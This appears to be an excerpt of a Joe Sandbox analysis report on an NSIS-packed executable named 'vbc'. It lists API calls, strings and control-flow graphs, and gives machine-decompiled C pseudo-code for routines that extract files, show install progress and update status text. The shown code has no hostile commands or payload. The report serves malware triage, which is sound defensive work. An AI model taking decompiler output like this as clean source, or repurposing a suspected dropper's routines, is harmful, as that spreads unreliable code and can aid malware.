                    0x00000000
                    0x00403200
                    0x00403203
                    0x00403227
                    0x00403227
                    0x0040322c
                    0x00403232
                    0x0040323d
                    0x00403242
                    0x00403242
                    0x00403245
                    0x00403246
                    0x00403247
                    0x00403249
                    0x0040324e
                    0x00403251
                    0x00403264
                    0x00403268
                    0x00403270
                    0x00403275
                    0x00403277
                    0x00403277
                    0x00403277
                    0x0040327f
                    0x0040327f
                    0x00403282
                    0x00403283
                    0x00403283
                    0x00403286
                    0x00403288
                    0x00403288
                    0x00403288
                    0x00403292
                    0x00403298
                    0x004032a6
                    0x004032ab
                    0x00000000
                    0x004032ab
                    0x00000000
                    0x00403251
                    0x0040320b
                    0x00403216
                    0x0040321b
                    0x0040321d
                    0x00000000
                    0x00000000
                    0x00403222
                    0x00403225
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040310b
                    0x00403110
                    0x00403115
                    0x00403119
                    0x00403120
                    0x00403125
                    0x00403127
                    0x00403129
                    0x00403129
                    0x0040312d
                    0x00403132
                    0x00403134
                    0x0040325c
                    0x00403253
                    0x00000000
                    0x00403253
                    0x0040313a
                    0x00403141
                    0x004031bd
                    0x004031c1
                    0x004031c5
                    0x004031ca
                    0x00000000
                    0x004031c1
                    0x0040314a
                    0x0040314f
                    0x00403152
                    0x00403157
                    0x00000000
                    0x00000000
                    0x00403159
                    0x00403160
                    0x00000000
                    0x00000000
                    0x00403162
                    0x00403169
                    0x00000000
                    0x00000000
                    0x0040316b
                    0x00403172
                    0x00000000
                    0x00000000
                    0x00403174
                    0x0040317b
                    0x00000000
                    0x00000000
                    0x0040317d
                    0x00403183
                    0x0040318c
                    0x00403192
                    0x00403195
                    0x00403197
                    0x0040319d
                    0x00000000
                    0x00000000
                    0x004031a3
                    0x004031a7
                    0x004031af
                    0x004031af
                    0x004031b2
                    0x004031b5
                    0x004031b7
                    0x004031b9
                    0x004031b9
                    0x00000000
                    0x004031b7
                    0x004031a9
                    0x004031ad
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031cb
                    0x004031cb
                    0x004031d1
                    0x004031dd
                    0x004031dd
                    0x004031e0
                    0x004031e6
                    0x004031e6
                    0x004031e6
                    0x004031ee
                    0x004031ee
                    0x00000000
                    0x004031ee

                    APIs
                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040385A,?), ref: 0040308E
                    • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                      • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                      • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                    • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                    Strings
                    • Inst, xrefs: 00403162
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                    • soft, xrefs: 0040316B
                    • Error launching installer, xrefs: 004030CD
                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                    • Null, xrefs: 00403174
                    • Z8@, xrefs: 00403227, 00403242
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                    • API String ID: 2803837635-1309756075
                    • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                    • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                    • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                    • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 727 40176f-401794 call 402da6 call 405e60 732 401796-40179c call 40651a 727->732 733 40179e-4017b0 call 40651a call 405de9 lstrcatW 727->733 738 4017b5-4017b6 call 4067a1 732->738 733->738 742 4017bb-4017bf 738->742 743 4017c1-4017cb call 406850 742->743 744 4017f2-4017f5 742->744 751 4017dd-4017ef 743->751 752 4017cd-4017db CompareFileTime 743->752 745 4017f7-4017f8 call 405fe5 744->745 746 4017fd-401819 call 40600a 744->746 745->746 754 40181b-40181e 746->754 755 40188d-4018b6 call 40557c call 4032b4 746->755 751->744 752->751 756 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 754->756 757 40186f-401879 call 40557c 754->757 767 4018b8-4018bc 755->767 768 4018be-4018ca SetFileTime 755->768 756->742 789 401864-401865 756->789 769 401882-401888 757->769 767->768 771 4018d0-4018db CloseHandle 767->771 768->771 772 402c33 769->772 775 4018e1-4018e4 771->775 776 402c2a-402c2d 771->776 774 402c35-402c39 772->774 779 4018e6-4018f7 call 406557 lstrcatW 775->779 780 4018f9-4018fc call 406557 775->780 776->772 786 401901-402398 779->786 780->786 790 40239d-4023a2 786->790 791 402398 call 405b7a 786->791 789->769 792 401867-401868 789->792 790->774 791->790 792->757
                    C-Code - Quality: 61%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                    				void* __esi;
                    				void* _t35;
                    				void* _t43;
                    				void* _t45;
                    				FILETIME* _t51;
                    				FILETIME* _t64;
                    				void* _t66;
                    				signed int _t72;
                    				FILETIME* _t73;
                    				FILETIME* _t77;
                    				signed int _t79;
                    				WCHAR* _t81;
                    				void* _t83;
                    				void* _t84;
                    				void* _t86;
                    
                    				_t77 = __ebx;
                    				 *(_t86 - 8) = E00402DA6(0x31);
                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                    				_t35 = E00405E60( *(_t86 - 8));
                    				_push( *(_t86 - 8));
                    				_t81 = L"Call";
                    				if(_t35 == 0) {
                    					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
                    				} else {
                    					E0040651A();
                    				}
                    				E004067A1(_t81);
                    				while(1) {
                    					__eflags =  *(_t86 + 8) - 3;
                    					if( *(_t86 + 8) >= 3) {
                    						_t66 = E00406850(_t81);
                    						_t79 = 0;
                    						__eflags = _t66 - _t77;
                    						if(_t66 != _t77) {
                    							_t73 = _t66 + 0x14;
                    							__eflags = _t73;
                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                    						}
                    						asm("sbb eax, eax");
                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                    						__eflags = _t72;
                    						 *(_t86 + 8) = _t72;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) == _t77) {
                    						E00405FE5(_t81);
                    					}
                    					__eflags =  *(_t86 + 8) - 1;
                    					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                    					__eflags = _t43 - 0xffffffff;
                    					 *(_t86 - 0x38) = _t43;
                    					if(_t43 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) != _t77) {
                    						E0040557C(0xffffffe2,  *(_t86 - 8));
                    						__eflags =  *(_t86 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
                    						__eflags =  *0x7a8ae8;
                    						goto L32;
                    					} else {
                    						E0040651A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", _t83);
                    						E0040651A(_t83, _t81);
                    						E00406557(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                    						E0040651A(_t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp");
                    						_t64 = E00405B7A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                    						__eflags = _t64;
                    						if(_t64 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t64 == 1;
                    							if(_t64 == 1) {
                    								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
                    								L32:
                    								_t51 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(_t81);
                    								_push(0xfffffffa);
                    								E0040557C();
                    								L29:
                    								_t51 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t51;
                    				}
                    				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
                    				 *0x7a8b14 =  *0x7a8b14 + 1;
                    				_push(_t77);
                    				_push(_t77);
                    				_push( *(_t86 - 0x38));
                    				_push( *((intOrPtr*)(_t86 - 0x28)));
                    				_t45 = E004032B4(); // executed
                    				 *0x7a8b14 =  *0x7a8b14 - 1;
                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                    				_t84 = _t45;
                    				if( *(_t86 - 0x24) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				CloseHandle( *(_t86 - 0x38)); // executed
                    				__eflags = _t84 - _t77;
                    				if(_t84 >= _t77) {
                    					goto L31;
                    				} else {
                    					__eflags = _t84 - 0xfffffffe;
                    					if(_t84 != 0xfffffffe) {
                    						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
                    					} else {
                    						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
                    						lstrcatW(_t81,  *(_t86 - 8));
                    					}
                    					_push(0x200010);
                    					_push(_t81);
                    					E00405B7A();
                    					goto L29;
                    				}
                    				goto L33;
                    			}

                    0x0040176f
                    0x00401776
                    0x00401782
                    0x00401785
                    0x0040178a
                    0x0040178d
                    0x00401794
                    0x004017b0
                    0x00401796
                    0x00401797
                    0x00401797
                    0x004017b6
                    0x004017bb
                    0x004017bb
                    0x004017bf
                    0x004017c2
                    0x004017c7
                    0x004017c9
                    0x004017cb
                    0x004017d0
                    0x004017d0
                    0x004017db
                    0x004017db
                    0x004017ec
                    0x004017ee
                    0x004017ee
                    0x004017ef
                    0x004017ef
                    0x004017f2
                    0x004017f5
                    0x004017f8
                    0x004017f8
                    0x004017ff
                    0x0040180e
                    0x00401813
                    0x00401816
                    0x00401819
                    0x00000000
                    0x00000000
                    0x0040181b
                    0x0040181e
                    0x00401874
                    0x00401879
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00402c2a
                    0x00402c2d
                    0x00402c2d
                    0x00000000
                    0x00401820
                    0x00401826
                    0x0040182d
                    0x0040183a
                    0x00401845
                    0x0040185b
                    0x0040185b
                    0x0040185e
                    0x00000000
                    0x00401864
                    0x00401864
                    0x00401865
                    0x00401882
                    0x00402c33
                    0x00402c33
                    0x00402c33
                    0x00401867
                    0x00401867
                    0x00401868
                    0x00401493
                    0x0040239d
                    0x0040239d
                    0x0040239d
                    0x00401865
                    0x0040185e
                    0x00402c35
                    0x00402c39
                    0x00402c39
                    0x00401892
                    0x00401897
                    0x0040189d
                    0x0040189e
                    0x0040189f
                    0x004018a2
                    0x004018a5
                    0x004018aa
                    0x004018b0
                    0x004018b4
                    0x004018b6
                    0x004018be
                    0x004018ca
                    0x004018b8
                    0x004018b8
                    0x004018bc
                    0x00000000
                    0x00000000
                    0x004018bc
                    0x004018d3
                    0x004018d9
                    0x004018db
                    0x00000000
                    0x004018e1
                    0x004018e1
                    0x004018e4
                    0x004018fc
                    0x004018e6
                    0x004018e9
                    0x004018f2
                    0x004018f2
                    0x00401901
                    0x00401906
                    0x00402398
                    0x00000000
                    0x00402398
                    0x00000000

                    APIs
                    • lstrcatW.KERNEL32 ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                      • Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
                      • Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll$Call
                    • API String ID: 1941528284-3429065576
                    • Opcode ID: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                    • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                    • Opcode Fuzzy Hash: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
                    • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 793 4032b4-4032cb 794 4032d4-4032dd 793->794 795 4032cd 793->795 796 4032e6-4032eb 794->796 797 4032df 794->797 795->794 798 4032fb-403308 call 4034ac 796->798 799 4032ed-4032f6 call 4034c2 796->799 797->796 803 40349a 798->803 804 40330e-403312 798->804 799->798 805 40349c-40349d 803->805 806 403445-403447 804->806 807 403318-40333e GetTickCount 804->807 810 4034a5-4034a9 805->810 808 403487-40348a 806->808 809 403449-40344c 806->809 811 4034a2 807->811 812 403344-40334c 807->812 813 40348c 808->813 814 40348f-403498 call 4034ac 808->814 809->811 815 40344e 809->815 811->810 816 403351-40335f call 4034ac 812->816 817 40334e 812->817 813->814 814->803 825 40349f 814->825 819 403451-403457 815->819 816->803 827 403365-40336e 816->827 817->816 822 403459 819->822 823 40345b-403469 call 4034ac 819->823 822->823 823->803 831 40346b-403470 call 4060bc 823->831 825->811 828 403374-403394 call 406a42 827->828 835 40339a-4033ad GetTickCount 828->835 836 40343d-40343f 828->836 834 403475-403477 831->834 837 403441-403443 834->837 838 403479-403483 834->838 839 4033f8-4033fa 835->839 840 4033af-4033b7 835->840 836->805 837->805 838->819 841 403485 838->841 844 403431-403435 839->844 845 4033fc-403400 839->845 842 4033b9-4033bd 840->842 843 4033bf-4033f0 MulDiv wsprintfW call 40557c 840->843 841->811 842->839 842->843 851 4033f5 843->851 844->812 846 40343b 844->846 848 403402-403409 call 4060bc 845->848 849 403417-403422 845->849 846->811 854 40340e-403410 848->854 850 403425-403429 849->850 850->828 853 40342f 850->853 851->839 853->811 854->837 855 403412-403415 854->855 855->850
                    C-Code - Quality: 95%
                    			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                    				signed int _v8;
                    				int _v12;
                    				intOrPtr _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				short _v152;
                    				void* _t65;
                    				void* _t69;
                    				long _t70;
                    				intOrPtr _t74;
                    				long _t75;
                    				intOrPtr _t76;
                    				void* _t77;
                    				int _t87;
                    				intOrPtr _t91;
                    				intOrPtr _t94;
                    				long _t95;
                    				signed int _t96;
                    				int _t97;
                    				int _t98;
                    				intOrPtr _t99;
                    				void* _t100;
                    				void* _t101;
                    
                    				_t96 = _a16;
                    				_t91 = _a12;
                    				_v12 = _t96;
                    				if(_t91 == 0) {
                    					_v12 = 0x8000;
                    				}
                    				_v8 = _v8 & 0x00000000;
                    				_v16 = _t91;
                    				if(_t91 == 0) {
                    					_v16 = 0x797700;
                    				}
                    				_t62 = _a4;
                    				if(_a4 >= 0) {
                    					E004034C2( *0x7a8ab8 + _t62);
                    				}
                    				if(E004034AC( &_a16, 4) == 0) {
                    					L41:
                    					_push(0xfffffffd);
                    					goto L42;
                    				} else {
                    					if((_a19 & 0x00000080) == 0) {
                    						if(_t91 != 0) {
                    							if(_a16 < _t96) {
                    								_t96 = _a16;
                    							}
                    							if(E004034AC(_t91, _t96) != 0) {
                    								_v8 = _t96;
                    								L44:
                    								return _v8;
                    							} else {
                    								goto L41;
                    							}
                    						}
                    						if(_a16 <= _t91) {
                    							goto L44;
                    						}
                    						_t87 = _v12;
                    						while(1) {
                    							_t97 = _a16;
                    							if(_a16 >= _t87) {
                    								_t97 = _t87;
                    							}
                    							if(E004034AC(0x793700, _t97) == 0) {
                    								goto L41;
                    							}
                    							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
                    							if(_t69 == 0) {
                    								L28:
                    								_push(0xfffffffe);
                    								L42:
                    								_pop(_t65);
                    								return _t65;
                    							}
                    							_v8 = _v8 + _t97;
                    							_a16 = _a16 - _t97;
                    							if(_a16 > 0) {
                    								continue;
                    							}
                    							goto L44;
                    						}
                    						goto L41;
                    					}
                    					_t70 = GetTickCount();
                    					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                    					_t14 =  &_a16;
                    					 *_t14 = _a16 & 0x7fffffff;
                    					_v20 = _t70;
                    					 *0x40ce40 = 0xb;
                    					_a4 = _a16;
                    					if( *_t14 <= 0) {
                    						goto L44;
                    					} else {
                    						goto L9;
                    					}
                    					while(1) {
                    						L9:
                    						_t98 = 0x4000;
                    						if(_a16 < 0x4000) {
                    							_t98 = _a16;
                    						}
                    						if(E004034AC(0x793700, _t98) == 0) {
                    							goto L41;
                    						}
                    						_a16 = _a16 - _t98;
                    						 *0x40ce30 = 0x793700;
                    						 *0x40ce34 = _t98;
                    						while(1) {
                    							_t94 = _v16;
                    							 *0x40ce38 = _t94;
                    							 *0x40ce3c = _v12;
                    							_t74 = E00406A42(0x40ce30);
                    							_v24 = _t74;
                    							if(_t74 < 0) {
                    								break;
                    							}
                    							_t99 =  *0x40ce38; // 0x79bd28
                    							_t100 = _t99 - _t94;
                    							_t75 = GetTickCount();
                    							_t95 = _t75;
                    							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                    								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                    								_t101 = _t101 + 0xc;
                    								E0040557C(0,  &_v152); // executed
                    								_v20 = _t95;
                    							}
                    							if(_t100 == 0) {
                    								if(_a16 > 0) {
                    									goto L9;
                    								}
                    								goto L44;
                    							} else {
                    								if(_a12 != 0) {
                    									_t76 =  *0x40ce38; // 0x79bd28
                    									_v8 = _v8 + _t100;
                    									_v12 = _v12 - _t100;
                    									_v16 = _t76;
                    									L23:
                    									if(_v24 != 4) {
                    										continue;
                    									}
                    									goto L44;
                    								}
                    								_t77 = E004060BC(_a8, _v16, _t100); // executed
                    								if(_t77 == 0) {
                    									goto L28;
                    								}
                    								_v8 = _v8 + _t100;
                    								goto L23;
                    							}
                    						}
                    						_push(0xfffffffc);
                    						goto L42;
                    					}
                    					goto L41;
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                    • GetTickCount.KERNEL32(0040CE30,00793700,00004000), ref: 004033A2
                    • MulDiv.KERNEL32 ref: 004033CB
                    • wsprintfW.USER32 ref: 004033DE
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CountTick$wsprintf
                    • String ID: ... %d%%$Z8@
                    • API String ID: 551687249-843941321
                    • Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                    • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                    • Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
                    • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 856 40557c-405591 857 405597-4055a8 856->857 858 405648-40564c 856->858 859 4055b3-4055bf lstrlenW 857->859 860 4055aa-4055ae call 406557 857->860 862 4055c1-4055d1 lstrlenW 859->862 863 4055dc-4055e0 859->863 860->859 862->858 864 4055d3-4055d7 lstrcatW 862->864 865 4055e2-4055e9 SetWindowTextW 863->865 866 4055ef-4055f3 863->866 864->863 865->866 867 4055f5-405637 SendMessageW * 3 866->867 868 405639-40563b 866->868 867->868 868->858 869 40563d-405640 868->869 869->858
                    C-Code - Quality: 100%
                    			E0040557C(signed int _a4, WCHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				WCHAR* _v32;
                    				long _v44;
                    				int _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t27;
                    				signed int _t28;
                    				long _t29;
                    				signed int _t37;
                    				signed int _t38;
                    
                    				_t27 =  *0x7a7a44;
                    				_v8 = _t27;
                    				if(_t27 != 0) {
                    					_t37 =  *0x7a8b14;
                    					_v12 = _t37;
                    					_t38 = _t37 & 0x00000001;
                    					if(_t38 == 0) {
                    						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
                    					}
                    					_t27 = lstrlenW(0x7a0f28);
                    					_a4 = _t27;
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x7a0f28;
                    							_v52 = 1;
                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                    							_v44 = 0;
                    							_v48 = _t29 - _t38;
                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                    						}
                    						if(_t38 != 0) {
                    							_t28 = _a4;
                    							0x7a0f28[_t28] = 0;
                    							return _t28;
                    						}
                    					} else {
                    						_t27 = lstrlenW(_a8) + _a4;
                    						if(_t27 < 0x1000) {
                    							_t27 = lstrcatW(0x7a0f28, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t27;
                    			}

                    APIs
                    • lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                    • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                    • lstrcatW.KERNEL32 ref: 004055D7
                    • SetWindowTextW.USER32 ref: 004055E9
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID:
                    • API String ID: 1495540970-0
                    • Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                    • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                    • Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                    • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
